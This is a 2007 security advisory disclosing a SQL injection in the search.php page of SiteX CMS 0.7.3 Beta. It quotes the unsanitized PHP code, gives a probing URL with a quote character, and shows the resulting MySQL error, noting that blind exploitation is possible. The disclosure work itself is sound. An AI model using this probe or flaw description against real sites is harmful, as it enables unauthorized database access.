[waraxe-2007-SA#055] - Sql Injection in SiteX CMS 0.7.3 Beta

[waraxe-2007-SA#055] - Sql Injection in SiteX CMS 0.7.3 Beta

Author: Janek Vind "waraxe"
Date: 27. September 2007
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-55.html

Target software description:

http://sitex.bjsintay.com/

SiteX is a versitile web tool that will enable you to start your own dynamic website in under 5 minutes. Driven by PHP and MySQL, SiteX consists of components common to most personal and professional websites.

Vulnerabilities: Sql Injection in "search.php"

Let's analyze "search.php" source code:

Do you need help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

------------>[source code]<------------

if(isset($_GET['search']))

        $search = stripslashes($search);

$search = trim(stripslashes($search));
...
$sxPhotoResults = sxPhotoSearchResults($search);

------------>[/source code]<-----------

As we can see, stripslashes() is used against search string, so that "magic_quotes" will not help against sql injection. And following function "sxPhotoSearchResults()" is not sanitizing search string either.

So let's have a test:

http://victim.com/search.php?search=O'Brien

Do you need more help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

and we get nice error message:

SiteX experienced error #1 with an SQL bash readout of : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Brien%' OR SiteX_Photos.name LIKE '%O'Brien%' OR SiteX_Photos.description LIKE '' at line 2

Yep, sql injection exists here. Now, some facts about this injection:

1. This seems to be exploitable only as blind sql injection. I have written proof-of-concept exploit for this and it is working as expected.
2. "magic_quotes" does not matter, because "stripslashes()" is used.
3. "register_globals" is not important either, because attack comes from "$_GET".

Greetings:

Greets to ToXiC, LINUX, y3dips, Sm0ke, Heintz, slimjim100, Chb and all other people who know me!
Greetings to Raido Kerna.
Tervitusi Torufoorumi rahvale!

Contact:

come2waraxe@yahoo.com
Janek Vind "waraxe"

Homepage: http://www.waraxe.us/

Can we help you?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

Shameless advertise:

Astronomy books - http://astronomy.oldreadings.com/ User Manuals - http://user-manuals.waraxe.us/

• [ EOF ] ------------------------------------